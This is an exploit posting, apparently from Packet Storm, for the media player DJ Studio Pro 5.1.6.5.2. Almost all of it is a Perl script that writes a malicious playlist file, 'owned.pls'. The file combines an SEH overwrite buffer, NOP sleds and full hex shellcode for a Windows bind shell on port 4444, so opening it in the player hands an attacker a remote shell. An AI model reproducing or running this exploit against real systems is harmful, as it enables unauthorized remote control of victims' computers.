DJ Studio Pro version 5.1.6.5.2 SEH overwrite exploit that binds a shell to port 4444.
cc228c8035f5d9617c749bd1bad2f32af474228e7b6845a4f55754fd6a839a7a#!/usr/bin/perl
# DJ Studio Pro 5.1.6.5.2 SEH Overwrite Exploit
# Written By Rehan Ahmed ( rehan@rewterz.com )
# Vulnerability Discovered By Prodigy
# Software Link : http://www.e-soft.co.uk/
# Tested on : Windows XP SP2 En
# OSVDB ID : 58159
my $file = "owned.pls";
my $junk = "A" x 1308;
my $nextseh = "\xeb\x06\x90\x90"; #6 bytes short JMP
my $seh = "\x2d\xc6\x4f\x01"; # pop/pop/ret (nosafeseh)
my $nops = "\x90" x 20;
my $nops2 = "\x90" x 6500;
# Windows Bind Shell 4444 ( 345 Bytes )
my $shellcode =
"\xb8\x06\xa4\x4a\x21\x29\xc9\xb1\x50\xda\xc2\xd9\x74\x24\xf4" .
"\x5a\x31\x42\x10\x83\xc2\x04\x03\x42\x0c\xe4\x51\xb6\x4b\x03" .
"\xd4\xaf\x75\x2c\x18\xd0\xe6\x59\x8b\x0b\xc3\xd6\x11\x68\x80" .
"\x94\x9c\xe8\x97\x8b\x14\x47\x80\xd8\x74\x78\xb1\x35\xc3\xf3" .
"\x85\x42\xd5\xed\xd7\x94\x4f\x5d\x93\xd4\x04\x99\x5d\x1e\xe9" .
"\xa4\x9f\x75\x06\x9d\x4b\xad\xcf\x97\x96\x26\x50\x7c\x58\xd3" .
"\x09\xf7\x56\x68\x5d\x58\x7b\x6f\x8a\x64\xaf\xe4\xc5\x07\x8b" .
"\xe6\xb4\x14\xe2\xcd\x53\x10\x46\xc1\x10\x66\x45\xaa\x57\x7b" .
"\xf8\x27\xd7\x8b\x5c\x5f\x56\xc5\x6e\x73\x36\x25\xb8\xed\xe4" .
"\xbf\x2d\xc2\x38\x28\xd9\x57\x0f\xf7\x71\x68\xbf\x6f\xb1\x7b" .
"\xbc\x4b\x15\x7c\xeb\xf3\x1c\x67\x72\x8d\xf2\x6f\x79\xd8\x66" .
"\x6d\x82\x32\x1e\xa8\x75\x46\x72\x1d\x79\x7e\xde\xf2\xd6\x2c" .
"\xb2\xb7\x8b\x91\x67\xc8\xfc\x70\xe0\x27\xa1\x1a\xa3\xce\xb8" .
"\x76\x2b\x74\x20\x09\x6b\x23\xaa\x3f\x19\xdb\x05\x95\x21\x0b" .
"\xcd\xb1\x73\x85\xe7\xed\x74\x0f\xa4\x44\x74\x7f\x23\x82\xc3" .
"\xf9\xfd\x1b\x2b\xd3\xae\xf7\x87\x8e\xb1\x28\xb4\x58\xa9\xb0" .
"\x7d\xe1\x62\xbc\x54\x44\x72\x92\x3f\x0c\xe8\x75\xa8\xb3\x9d" .
"\xf0\xcd\x59\x0e\x5a\x27\x51\x27\xbb\x5d\x2d\xb1\xa6\x93\x6d" .
"\x32\x8c\x2a\x2f\x98\x2f\x90\x83\x71\x42\x6f\xe3\xde\xf6\x3b" .
"\x7b\x53\xf7\x8f\x6d\x6c\x72\xb4\x6e\x44\x26\x63\xc2\x38\x88" .
"\xda\x88\xbb\x7b\x8c\x19\xed\x84\xfe\xc9\xa0\xa2\xfa\xc7\xe8" .
"\xab\xd3\xbd\xf1\xab\xeb\xbe\xde\xdf\x43\xbc\x5c\x1b\x0f\xc3" .
"\xb5\xf6\x2f\xeb\x52\x07\x45\x0f\xfc\xb4\xa5\xd9\xfd\xeb\x50";
open($FILE,">$file");
print $FILE $junk.$nextseh.$seh.$nops.$shellcode.$nops2;
close($FILE);
print "owned.pls File Successfully Created\n";
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed